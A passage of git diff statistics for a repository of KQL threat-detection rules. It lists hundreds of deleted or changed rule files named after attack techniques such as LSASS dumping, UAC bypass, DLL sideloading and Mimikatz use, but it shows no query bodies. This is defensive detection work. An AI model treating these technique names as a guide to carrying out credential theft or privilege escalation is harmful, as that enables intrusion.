...ce_Via_Microsoft_Office_Startup_Folder.kql | 7 - .../Potential_Persistence_Via_Mpnotify.kql | 7 - ...rsistence_Via_MyComputer_Registry_Keys.kql | 7 - ...ntial_Persistence_Via_Netsh_Helper_DLL.kql | 8 - ...stence_Via_Netsh_Helper_DLL_-_Registry.kql | 8 - ...ence_Via_New_AMSI_Providers_-_Registry.kql | 7 - ...tial_Persistence_Via_Notepad++_Plugins.kql | 7 - ...Potential_Persistence_Via_Outlook_Form.kql | 7 - ...tial_Persistence_Via_Outlook_Home_Page.kql | 7 - ...utlook_LoadMacroProviderOnBoot_Setting.kql | 7 - ...al_Persistence_Via_Outlook_Today_Pages.kql | 7 - ...wershell_Search_Order_Hijacking_-_Task.kql | 7 - ...rsistence_Via_Scrobj.dll_COM_Hijacking.kql | 7 - ...Via_Shim_Database_In_Uncommon_Location.kql | 7 - ...istence_Via_Shim_Database_Modification.kql | 9 - .../Potential_Persistence_Via_TypedPaths.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...nce_Via_Visual_Studio_Tools_for_Office.kql | 7 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - ...tion_Using_Symlink_Between_Osk_and_Cmd.kql | 7 - ...thorized_MBR_Tampering_Via_Bcdedit.EXE.kql | 7 - ...istence_Attempt_Via_DbgManagedDebugger.kql | 7 - ...sistence_Attempt_Via_Windows_Telemetry.kql | 11 - ...ential_RipZip_Attack_on_Startup_Folder.kql | 10 - ...ll_Context_Menu_Scan_Command_Tampering.kql | 7 - ...m_Database_Persistence_via_Sdbinst.EXE.kql | 9 - ...hortcut_Persistence_Via_PowerShell.EXE.kql | 11 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...picious_PowerShell_Module_File_Created.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - ...al_Webshell_Creation_On_Static_Website.kql | 7 - ...ally_Suspicious_ODBC_Driver_Registered.kql | 7 - .../PowerShell_Module_File_Created.kql | 7 - ...File_Created_By_Non-PowerShell_Process.kql | 7 - .../PowerShell_Profile_Modification.kql | 7 - ...hell_Script_Dropped_Via_PowerShell.EXE.kql | 7 - Persistence/Powerup_Write_Hijack_DLL.kql | 10 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 9 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 7 - .../RDP_Sensitive_Settings_Changed.kql | 9 - ...RDP_Sensitive_Settings_Changed_to_Zero.kql | 9 - .../Register_New_IFiltre_For_Persistence.kql | 9 - ..._Modification_to_Hidden_File_Extension.kql | 7 - ...istry_Persistence_via_Explorer_Run_Key.kql | 7 - .../Rundll32_Registered_COM_Objects.kql | 7 - ...sions_via_the_Registry_2_VPN_Extension.kql | 7 - ...d_TaskCache_Change_by_Uncommon_Program.kql | 7 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - ...xecuting_Encoded_Payload_from_Registry.kql | 7 - ...d_Task_Executing_Payload_from_Registry.kql | 7 - ...Or_Modification_With_SYSTEM_Privileges.kql | 7 - ...vider_(SSP)_Added_to_LSA_Configuration.kql | 8 - Persistence/ServiceDll_Hijack.kql | 9 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...sion_Manager_Autorun_Keys_Modification.kql | 7 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - Persistence/Startup_Folder_File_Write.kql | 7 - .../Sticky_Key_Like_Backdoor_Execution.kql | 7 - ...cky_Key_Like_Backdoor_Usage_-_Registry.kql | 7 - .../Suspicious_ASPX_File_Drop_by_Exchange.kql | 7 - ...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...nstance_Executed_With_Custom_Extension.kql | 7 - ...spicious_Debugger_Registration_Cmdline.kql | 7 - ..._Download_From_Direct_IP_Via_Bitsadmin.kql | 7 - ...rom_File-Sharing_Website_Via_Bitsadmin.kql | 7 - ...spicious_Driver_Install_by_pnputil.exe.kql | 7 - ...vironment_Variable_Has_Been_Registered.kql | 7 - ..._Activity_From_Fake_Recycle.Bin_Folder.kql | 7 - .../Suspicious_File_Drop_by_Exchange.kql | 7 - .../Suspicious_Get-Variable.exe_Creation.kql | 10 - Persistence/Suspicious_GrpConv_Execution.kql | 7 - .../Suspicious_IIS_Module_Registration.kql | 7 - ...SExchangeMailboxReplication_ASPX_Write.kql | 7 - .../Suspicious_New_Service_Creation.kql | 7 - .../Suspicious_Outlook_Macro_Created.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...icious_Powershell_In_Registry_Run_Keys.kql | 7 - ...spicious_Process_By_Web_Server_Process.kql | 8 - ...Execution_From_Fake_Recycle.Bin_Folder.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - .../Suspicious_Run_Key_from_Download.kql | 7 - ...ed_Task_Creation_Involving_Temp_Folder.kql | 7 - ...Task_Creation_via_Masqueraded_XML_File.kql | 7 - ...Scheduled_Task_Write_to_System32_Tasks.kql | 7 - ...ious_Schtasks_Execution_AppData_Folder.kql | 7 - ...cious_Screensaver_Binary_File_Creation.kql | 9 - ...CL_Modification_Via_Set-Service_Cmdlet.kql | 7 - .../Suspicious_Service_Path_Modification.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - ...icious_Shim_Database_Patching_Activity.kql | 7 - .../Suspicious_Startup_Folder_Persistence.kql | 7 - ...icious_WindowsTerminal_Child_Processes.kql | 7 - Persistence/Suspicious_desktop.ini_Action.kql | 7 - .../Sysinternals_PsService_Execution.kql | 7 - .../Sysinternals_PsSuspend_Execution.kql | 7 - ...stem_Scripts_Autorun_Keys_Modification.kql | 7 - Persistence/Tasks_Folder_Evasion.kql | 10 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - Persistence/UAC_Bypass_With_Fake_DLL.kql | 7 - ..._Persistence_Via_Wpbbin_-_FileCreation.kql | 7 - ...rsistence_Via_Wpbbin_-_ProcessCreation.kql | 7 - ..._Database_Installation_Via_Sdbinst.EXE.kql | 9 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - .../Uncommon_Userinit_Child_Process.kql | 7 - ...allation_Attempt_Using_Add-AppxPackage.kql | 7 - .../User_Added_To_Highly_Privileged_Group.kql | 7 - ...er_Added_to_Local_Administrators_Group.kql | 7 - ...er_Added_to_Remote_Desktop_Users_Group.kql | 7 - .../VBScript_Payload_Stored_in_Registry.kql | 7 - .../VMToolsd_Suspicious_Child_Process.kql | 7 - ...VsCode_Powershell_Profile_Modification.kql | 7 - Persistence/WINEKEY_Registry_Modification.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - .../WMI_Backdoor_Exchange_Transport_Agent.kql | 7 - ...sistence_-_Command_Line_Event_Consumer.kql | 7 - ...MI_Persistence_-_Script_Event_Consumer.kql | 7 - ...nce_-_Script_Event_Consumer_File_Write.kql | 7 - ...l_Detection_With_Command_Line_Keywords.kql | 7 - .../Webshell_Hacking_Activity_Patterns.kql | 8 - .../Webshell_Tool_Reconnaissance_Activity.kql | 8 - .../WinSock2_Autorun_Keys_Modification.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - ...tings_Modification_By_Uncommon_Process.kql | 7 - .../Winget_Admin_Settings_Modification.kql | 7 - ...inlogon_AllowMultipleTSSessions_Enable.kql | 10 - .../Winlogon_Notify_Key_Logon_Persistence.kql | 9 - ...Node_Classes_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...Of_Malicious_Files_To_The_Fonts_Folder.kql | 7 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - ...rivilege_by_Arbitrary_Parent_Processes.kql | 7 - ...levated_MSI_Spawned_Cmd_And_Powershell.kql | 7 - ...ays_Install_Elevated_Windows_Installer.kql | 7 - ...work_Service_Potential_DLL_Sideloading.kql | 7 - .../Bypass_UAC_Using_DelegateExecute.kql | 7 - .../Bypass_UAC_Using_SilentCleanup_Task.kql | 10 - Privilege Escalation/Bypass_UAC_via_CMSTP.kql | 7 - .../Bypass_UAC_via_Fodhelper.exe.kql | 7 - .../Bypass_UAC_via_WSReset.exe.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - Privilege Escalation/COM_Hijack_via_Sdclt.kql | 7 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ...R_DLL_Loaded_By_Scripting_Applications.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...ackTool_-_Empire_PowerShell_UAC_Bypass.kql | 7 - ...ackTool_-_SharpImpersonation_Execution.kql | 7 - ...kTool_-_SharpUp_PrivEsc_Tool_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - .../HackTool_-_winPEAS_Execution.kql | 7 - Privilege Escalation/Interactive_AT_Job.kql | 7 - .../LiveKD_Driver_Creation.kql | 7 - ...KD_Driver_Creation_By_Uncommon_Process.kql | 7 - ...LiveKD_Kernel_Memory_Dump_File_Created.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - ...inject_Inject_DLL_Into_Running_Process.kql | 7 - .../Microsoft_Office_DLL_Sideload.kql | 7 - .../Modify_Group_Policy_Settings.kql | 7 - ...odify_User_Shell_Folders_Startup_Value.kql | 7 - .../New_Kernel_Driver_Via_SC.EXE.kql | 7 - .../New_Service_Creation_Using_PowerShell.kql | 7 - .../New_Service_Creation_Using_Sc.EXE.kql | 7 - ...ders_Registered_With_Uncommon_DLL_Name.kql | 10 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - .../PUA_-_AdvancedRun_Execution.kql | 7 - ...PUA_-_AdvancedRun_Suspicious_Execution.kql | 7 - .../PUA_-_Wsudo_Suspicious_Execution.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Path_To_Screensaver_Binary_Modified.kql | 7 - .../Persistence_Via_Sticky_Key_Backdoor.kql | 9 - ...scalation_via_Weak_Service_Permissions.kql | 7 - .../Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_AVKkid.DLL_Sideloading.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - .../Potential_Azure_Browser_SSO_Abuse.kql | 9 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - ...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - .../Potential_EACore.DLL_Sideloading.kql | 7 - .../Potential_Edputil.DLL_Sideloading.kql | 7 - .../Potential_Goopdate.DLL_Sideloading.kql | 7 - .../Potential_Iviewers.DLL_Sideloading.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - .../Potential_Mfdetours.DLL_Sideloading.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...ntial_Persistence_Via_Netsh_Helper_DLL.kql | 8 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - ...tion_Using_Symlink_Between_Osk_and_Cmd.kql | 7 - ...ation_via_Service_Permissions_Weakness.kql | 7 - .../Potential_Rcdll.DLL_Sideloading.kql | 7 - ....DLL_Sideloading_From_Default_Location.kql | 7 - ..._Sideloading_From_Non-Default_Location.kql | 7 - .../Potential_RoboForm.DLL_Sideloading.kql | 7 - ...otential_ShellDispatch.DLL_Sideloading.kql | 7 - ...m_Database_Persistence_via_Sdbinst.EXE.kql | 9 - .../Potential_SmadHook.DLL_Sideloading.kql | 7 - ...ential_SolidPDFCreator.DLL_Sideloading.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - .../Potential_UAC_Bypass_Via_Sdclt.EXE.kql | 7 - .../Potential_Vivaldi_elf.DLL_Sideloading.kql | 7 - .../Potential_WWlib.DLL_Sideloading.kql | 7 - .../Potential_Waveedit.DLL_Sideloading.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - .../Potential_appverifUI.DLL_Sideloading.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ..._Suspicious_Event_Viewer_Child_Process.kql | 7 - .../PowerShell_Profile_Modification.kql | 7 - .../Powerup_Write_Hijack_DLL.kql | 10 - ...rocess_Creation_Using_Sysnative_Folder.kql | 7 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 9 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 7 - .../Regedit_as_Trusted_Installer.kql | 7 - .../Renamed_Mavinject.EXE_Execution.kql | 7 - .../Rundll32_Registered_COM_Objects.kql | 7 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - .../Sdclt_Child_Processes.kql | 7 - ..._Privileges_Enumeration_Via_Whoami.EXE.kql | 7 - Privilege Escalation/ServiceDll_Hijack.kql | 9 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - .../Shell_Open_Registry_Keys_Manipulation.kql | 7 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - .../Sticky_Key_Like_Backdoor_Execution.kql | 7 - ...cky_Key_Like_Backdoor_Usage_-_Registry.kql | 7 - .../Suspect_Svchost_Activity.kql | 7 - ...icious_Child_Process_Created_as_System.kql | 7 - ...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...Suspicious_Child_Process_Of_Wermgr.EXE.kql | 7 - ...spicious_Debugger_Registration_Cmdline.kql | 7 - ...ication_on_the_Printer_Spooler_Service.kql | 7 - .../Suspicious_New_Service_Creation.kql | 7 - ...ious_Printer_Driver_Empty_Manufacturer.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - ...Suspicious_RunAs-Like_Flag_Combination.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...uspicious_ScreenSave_Change_by_Reg.exe.kql | 9 - .../Suspicious_Service_Path_Modification.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - ...Suspicious_Spool_Service_Child_Process.kql | 7 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - ...ass_Abusing_Winsat_Path_Parsing_-_File.kql | 7 - ..._Abusing_Winsat_Path_Parsing_-_Process.kql | 7 - ...Abusing_Winsat_Path_Parsing_-_Registry.kql | 7 - ...AC_Bypass_Tools_Using_ComputerDefaults.kql | 7 - ...Bypass_Using_.NET_Code_Profiler_on_MMC.kql | 7 - .../UAC_Bypass_Using_ChangePK_and_SLUI.kql | 7 - ...pass_Using_Consent_and_Comctl32_-_File.kql | 7 - ...s_Using_Consent_and_Comctl32_-_Process.kql | 7 - .../UAC_Bypass_Using_Disk_Cleanup.kql | 7 - .../UAC_Bypass_Using_DismHost.kql | 7 - .../UAC_Bypass_Using_EventVwr.kql | 7 - ..._Bypass_Using_Event_Viewer_RecentViews.kql | 7 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_Process.kql | 7 - .../UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql | 7 - ...ing_MSConfig_Token_Modification_-_File.kql | 7 - ..._MSConfig_Token_Modification_-_Process.kql | 7 - ...Bypass_Using_NTFS_Reparse_Point_-_File.kql | 7 - ...ass_Using_NTFS_Reparse_Point_-_Process.kql | 7 - .../UAC_Bypass_Using_PkgMgr_and_DISM.kql | 7 - ...pass_Using_Windows_Media_Player_-_File.kql | 7 - ...s_Using_Windows_Media_Player_-_Process.kql | 7 - ..._Using_Windows_Media_Player_-_Registry.kql | 7 - .../UAC_Bypass_Via_Wsreset.kql | 7 - Privilege Escalation/UAC_Bypass_WSReset.kql | 7 - .../UAC_Bypass_With_Fake_DLL.kql | 7 - .../UAC_Bypass_via_Event_Viewer.kql | 7 - .../UAC_Bypass_via_ICMLuaUtil.kql | 7 - Privilege Escalation/UAC_Bypass_via_Sdclt.kql | 7 - ...ss_via_Windows_Firewall_Snap-In_Hijack.kql | 7 - Privilege Escalation/UAC_Disabled.kql | 8 - .../UAC_Notification_Disabled.kql | 10 - .../UAC_Secure_Desktop_Prompt_Disabled.kql | 10 - ..._Database_Installation_Via_Sdbinst.EXE.kql | 9 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - ...VsCode_Powershell_Profile_Modification.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - ...MI_Persistence_-_Script_Event_Consumer.kql | 7 - ....EXE_Execution_From_Privileged_Process.kql | 7 - .../Windows_Kernel_Debugger_Execution.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - README.md | 170 ++++++++----- helper.py | 237 ++++++++++++++++++ requirements.txt | 15 ++ 4082 files changed, 26482 insertions(+), 13667 deletions(-) delete mode 100644 Collection/7Zip_Compressing_Dump_Files.kql delete mode 100644 Collection/Audio_Capture_via_PowerShell.kql delete mode 100644 Collection/Audio_Capture_via_SoundRecorder.kql delete mode 100644 Collection/Automated_Collection_Command_Prompt.kql delete mode 100644 Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql delete mode 100644 Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql delete mode 100644 Collection/Compressed_File_Creation_Via_Tar.EXE.kql delete mode 100644 Collection/Compressed_File_Extraction_Via_Tar.EXE.kql delete mode 100644 Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql delete mode 100644 Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql delete mode 100644 Collection/Esentutl_Steals_Browser_Information.kql delete mode 100644 Collection/Exchange_PowerShell_Snap-Ins_Usage.kql delete mode 100644 Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql delete mode 100644 Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql delete mode 100644 Collection/PUA_-_Mouse_Lock_Execution.kql delete mode 100644 Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql delete mode 100644 Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql delete mode 100644 Collection/Rar_Usage_with_Password_and_Compression_Level.kql delete mode 100644 Collection/Recon_Information_for_Export_with_Command_Prompt.kql delete mode 100644 Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Collection/SQLite_Chromium_Profile_Data_DB_Access.kql delete mode 100644 Collection/SQLite_Firefox_Profile_Data_DB_Access.kql delete mode 100644 Collection/Screen_Capture_Activity_Via_Psr.EXE.kql delete mode 100644 Collection/Suspicious_Camera_and_Microphone_Access.kql delete mode 100644 Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql delete mode 100644 Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql delete mode 100644 Collection/Veeam_Backup_Database_Suspicious_Query.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_-_Registry.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql delete mode 100644 Collection/Winrar_Compressing_Dump_Files.kql delete mode 100644 Collection/Winrar_Execution_in_Non-Standard_Folder.kql delete mode 100644 Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql delete mode 100644 Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql delete mode 100644 Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql delete mode 100644 Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql delete mode 100644 Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql delete mode 100644 Credential Access/Automated_Collection_Command_Prompt.kql delete mode 100644 Credential Access/Browser_Started_with_Remote_Debugging.kql delete mode 100644 Credential Access/Capture_Credentials_with_Rpcping.exe.kql delete mode 100644 Credential Access/Certificate_Exported_Via_PowerShell.kql delete mode 100644 Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql delete mode 100644 Credential Access/CrackMapExec_File_Indicators.kql delete mode 100644 Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql delete mode 100644 Credential Access/Cred_Dump_Tools_Dropped_Files.kql delete mode 100644 Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql delete mode 100644 Credential Access/Dropping_Of_Password_Filter_DLL.kql delete mode 100644 Credential Access/Dumping_Process_via_Sqldumper.exe.kql delete mode 100644 Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql delete mode 100644 Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql delete mode 100644 Credential Access/Enumeration_for_Credentials_in_Registry.kql delete mode 100644 Credential Access/Esentutl_Gather_Credentials.kql delete mode 100644 Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql delete mode 100644 Credential Access/Findstr_GPP_Passwords.kql delete mode 100644 Credential Access/HackTool_-_ADCSPwn_Execution.kql delete mode 100644 Credential Access/HackTool_-_Certify_Execution.kql delete mode 100644 Credential Access/HackTool_-_Certipy_Execution.kql delete mode 100644 Credential Access/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql delete mode 100644 Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql delete mode 100644 Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql delete mode 100644 Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql delete mode 100644 Credential Access/HackTool_-_Inveigh_Execution.kql delete mode 100644 Credential Access/HackTool_-_KrbRelayUp_Execution.kql delete mode 100644 Credential Access/HackTool_-_KrbRelay_Execution.kql delete mode 100644 Credential Access/HackTool_-_Mimikatz_Execution.kql delete mode 100644 Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql delete mode 100644 Credential Access/HackTool_-_Quarks_PwDump_Execution.kql delete mode 100644 Credential Access/HackTool_-_Rubeus_Execution.kql delete mode 100644 Credential Access/HackTool_-_SafetyKatz_Execution.kql delete mode 100644 Credential Access/HackTool_-_SecurityXploded_Execution.kql delete mode 100644 Credential Access/HackTool_-_WinPwn_Execution.kql delete mode 100644 Credential Access/Hacktool_Execution_-_PE_Metadata.kql delete mode 100644 Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql delete mode 100644 Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql delete mode 100644 Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql delete mode 100644 Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql delete mode 100644 Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql delete mode 100644 Credential Access/LSASS_Process_Memory_Dump_Files.kql delete mode 100644 Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql delete mode 100644 Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql delete mode 100644 Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql delete mode 100644 Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql delete mode 100644 Credential Access/Mimikatz_Kirbi_File_Creation.kql delete mode 100644 Credential Access/NPPSpy_Hacktool_Usage.kql delete mode 100644 Credential Access/NTDS.DIT_Created.kql delete mode 100644 Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql delete mode 100644 Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql delete mode 100644 Credential Access/NTDS_Exfiltration_Filename_Patterns.kql delete mode 100644 Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql delete mode 100644 Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql delete mode 100644 Credential Access/PUA_-_DIT_Snapshot_Viewer.kql delete mode 100644 Credential Access/PUA_-_Mouse_Lock_Execution.kql delete mode 100644 Credential Access/PUA_-_WebBrowserPassView_Execution.kql delete mode 100644 Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql delete mode 100644 Credential Access/PktMon.EXE_Execution.kql delete mode 100644 Credential Access/Potential_Browser_Data_Stealing.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_WER.kql delete mode 100644 Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql delete mode 100644 Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql delete mode 100644 Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql delete mode 100644 Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql delete mode 100644 Credential Access/Potential_Remote_Credential_Dumping_Activity.kql delete mode 100644 Credential Access/Potential_SAM_Database_Dump.kql delete mode 100644 Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql delete mode 100644 Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql delete mode 100644 Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql delete mode 100644 Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql delete mode 100644 Credential Access/PowerShell_Get-Process_LSASS.kql delete mode 100644 Credential Access/PowerShell_SAM_Copy.kql delete mode 100644 Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql delete mode 100644 Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql delete mode 100644 Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql delete mode 100644 Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql delete mode 100644 Credential Access/QuarksPwDump_Dump_File.kql delete mode 100644 Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql delete mode 100644 Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql delete mode 100644 Credential Access/SafetyKatz_Default_Dump_Filename.kql delete mode 100644 Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql delete mode 100644 Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql delete mode 100644 Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql delete mode 100644 Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql delete mode 100644 Credential Access/Suspicious_Dump64.exe_Execution.kql delete mode 100644 Credential Access/Suspicious_File_Event_With_Teams_Objects.kql delete mode 100644 Credential Access/Suspicious_Key_Manager_Access.kql delete mode 100644 Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql delete mode 100644 Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql delete mode 100644 Credential Access/Suspicious_PFX_File_Creation.kql delete mode 100644 Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql delete mode 100644 Credential Access/Suspicious_Reg_Add_Open_Command.kql delete mode 100644 Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql delete mode 100644 Credential Access/Suspicious_Serv-U_Process_Pattern.kql delete mode 100644 Credential Access/Suspicious_Unattend.xml_File_Access.kql delete mode 100644 Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql delete mode 100644 Credential Access/Time_Travel_Debugging_Utility_Usage.kql delete mode 100644 Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql delete mode 100644 Credential Access/Typical_HiveNightmare_SAM_File_Export.kql delete mode 100644 Credential Access/Uncommon_Outbound_Kerberos_Connection.kql delete mode 100644 Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql delete mode 100644 Credential Access/WerFault_LSASS_Process_Memory_Dump.kql delete mode 100644 Credential 